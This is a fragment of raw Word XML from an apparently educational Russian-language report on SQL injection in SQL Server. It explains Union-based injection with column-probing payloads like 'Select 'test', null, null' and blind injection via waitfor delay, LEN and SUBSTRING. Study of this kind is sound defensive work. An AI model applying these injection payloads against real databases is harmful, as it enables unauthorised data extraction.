    <w:p w:rsidR="008322CE" w:rsidRPr="00B73CCD" w:rsidRDefault="00DF708C"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заменив ключевое слово or на and.</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or</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291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Price</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B73CCD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidR="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>120</w:t>
      </w:r>
      <w:r w:rsidR="00B73CCD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> но также и все остальные. После добавления ключевого слова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and</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and</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291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Price</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291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Price</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08117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9A31ED">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екции с использованием процедуры waitfor delay называются Blind или слепые sql-</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6C445E" w:rsidRDefault="006C445E"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9F0170" w:rsidRDefault="009F0170" w:rsidP="009F0170"/>
    <w:p w:rsidR="00FA7AED" w:rsidRDefault="00FA7AED" w:rsidP="00FA7AED">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc420789645"/>
      <w:r w:rsidRPr="009F0170">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Алгоритм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 xml:space="preserve">-кода с помощью </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Union</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FC4D17" w:rsidRPr="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009F0170">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>оператора</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w:rsidR="00FA7AED" w:rsidRPr="009F0170" w:rsidRDefault="00FA7AED" w:rsidP="009F0170"/>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 xml:space="preserve">о на применении оператора </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Union</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001202D9" w:rsidRPr="003B32C2">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 xml:space="preserve">запросов </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Select</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003E6B06" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w: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w:t>
      </w:r>
      <w:r w:rsidR="00FC4D17" w:rsidRPr="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>запроса</w:t>
      </w:r>
      <w:r w:rsidR="00FC4D17">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Select</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FC4D17" w:rsidRPr="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, который мы добавляем посредством </w:t>
      </w:r>
      <w:r w:rsidR="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Union</w:t>
      </w:r>
      <w:r w:rsidR="00FC4D17" w:rsidRPr="00FC4D17">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FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">было </w:t>
      </w:r>
      <w:r w:rsidR="00FC4D17" w:rsidRPr="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>такое же</w:t>
      </w:r>
      <w:r w:rsidR="001202D9" w:rsidRPr="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003E6B06" w:rsidRPr="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>количество</w:t>
      </w:r>
      <w:r w:rsidR="00FC4D17" w:rsidRPr="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> возвращаемых параметров </w:t>
      </w:r>
      <w:r w:rsidR="003E6B06" w:rsidRPr="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidR="00FC4D17" w:rsidRPr="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> соответствующий</w:t>
      </w:r>
      <w:r w:rsidR="003E6B06" w:rsidRPr="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> тип</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O(log(n)), где n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w:t>
      </w:r>
      <w:r w:rsidR="00412520">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> значение, наподобие пробела, </w:t>
      </w:r>
      <w:r w:rsidR="00E12945">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidR="00E12945" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>имвола</w:t>
      </w:r>
      <w:r w:rsidR="00E12945">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> или</w:t>
      </w:r>
      <w:r w:rsidR="00B60516" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> цифры. Пример</w:t>
      </w:r>
      <w:r w:rsidR="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> добавочного запроса</w:t>
      </w:r>
      <w:r w:rsidR="00B60516" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</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Pr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Select</w:t>
      </w:r>
      <w:r w:rsidR="00D73001" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ‘test’, null, null </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00412520" w:rsidRPr="00412520"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412520" w:rsidRPr="00412520">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Select</w:t>
      </w:r>
      <w:r w:rsidR="00412520">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1,</w:t>
      </w:r>
      <w:r w:rsidR="00412520" w:rsidRPr="00412520">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> null, null </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D7300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sidRPr="00EA1778">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Select</w:t>
      </w:r>
      <w:r w:rsidR="00D73001" w:rsidRPr="00EA1778">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00412520">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="00412520" w:rsidRPr="00412520">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2015-05-30</w:t>
      </w:r>
      <w:r w:rsidR="00412520">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>’, null</w:t>
      </w:r>
      <w:r w:rsidR="00347079" w:rsidRPr="00EA1778">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, null </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00412520" w:rsidRDefault="00412520" w:rsidP="00412520">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00412520" w:rsidRPr="00412520" w:rsidRDefault="00412520" w:rsidP="004125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После </w:t>
      </w:r>
      <w:r w:rsidR="002C4CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>определения</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> количества и типов возвращаемых аргументов, злоумышленник передаёт sql-запрос, извлекающий данные из других таблиц.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00034EEB" w:rsidRPr="009F0170" w:rsidRDefault="002A4219" w:rsidP="009F0170">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc420429532"/>
      <w:bookmarkStart w:id="7" w:name="_Toc420789646"/>
      <w:r w:rsidRPr="009F0170">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Алгоритм внедрения sql-кода </w:t>
      </w:r>
      <w:r w:rsidR="002C4CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>с помощью</w:t>
      </w:r>
      <w:r w:rsidR="00671BB3" w:rsidRPr="009F0170">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">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Pr="00B97D9A" w:rsidRDefault="008E2C84" w:rsidP="008E2C84">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E2C84">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Инъекция с помощью оператора </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E2C84">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Union</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008E2C84">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> не всегда срабатывает.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>На сервере может стоять проверка типа и количества данных, полученные в результате запроса. В таком случае произойдёт перенаправление на страницу с ошибкой либо результаты инъекции и вовсе не будут показаны.</w:t>
      </w:r>
      <w:r w:rsidR="00671BB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Поэтому злоумышленник </w:t>
      </w:r>
      <w:r w:rsidR="00671BB3" w:rsidRPr="00671BB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>мож</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ет</w:t>
      </w:r>
      <w:r w:rsidR="00671BB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> использовать технику </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00671BB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Blind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00671BB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> или слепой sql-инъекции</w:t>
      </w:r>
      <w:r w:rsidR="00671BB3" w:rsidRPr="00671BB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00671BB3">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true/false.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C71B6" w:rsidRPr="002C71B6" w:rsidRDefault="002C71B6" w:rsidP="008E2C84">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C71B6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Наиболее используемые функции в слепой инъекции:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B97D9A" w:rsidRPr="00B97D9A" w:rsidRDefault="00187B14" w:rsidP="00B97D9A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LEN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lang w:val="en-US"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidR="00B97D9A" w:rsidRPr="00B97D9A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="00B97D9A" w:rsidRPr="00B97D9A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>expression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rPr>
        <w:t xml:space="preserve"> -возвращает количество символов указанного строкового выражения, исключая конечные пробелы.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xml:space="preserve"> - оцениваемое строковое </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="00B97D9A" w:rsidRPr="00B97D9A">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>выражение</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00B97D9A" w:rsidRPr="00B97D9A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Аргумент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может быть константой, переменной или столбцом любых символьных или двоичных данных.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B97D9A" w:rsidRPr="00B97D9A" w:rsidRDefault="00B97D9A" w:rsidP="00B97D9A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C71B6" w:rsidRPr="003654EA" w:rsidRDefault="00187B14" w:rsidP="00E62392">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SUBSTRING</w:t>
      </w:r>
      <w:r w:rsidR="00E62392" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(</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Возвращает часть символьного, двоичного, текстового или графического выражения в SQL </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E62392" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E62392" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. e</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E62392" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>xpression</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E62392" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Выражение типа character, binary, text, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E62392" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ntext</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E62392" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> или image. s</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E62392" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E62392" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -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начальную позицию возвращаемых символов. Если аргумент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имеет значение меньше 1, то возвращаемое выражение начинается с первого символа, который указан в аргументе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В этом случае количество возвращаемых символов равно сумме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1 либо равно 0, в зависимости от того, какое из значений больше. Если значение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больше количества символов в выражении значения, возвращается выражение нулевой длины. l</w:t>
      </w:r>
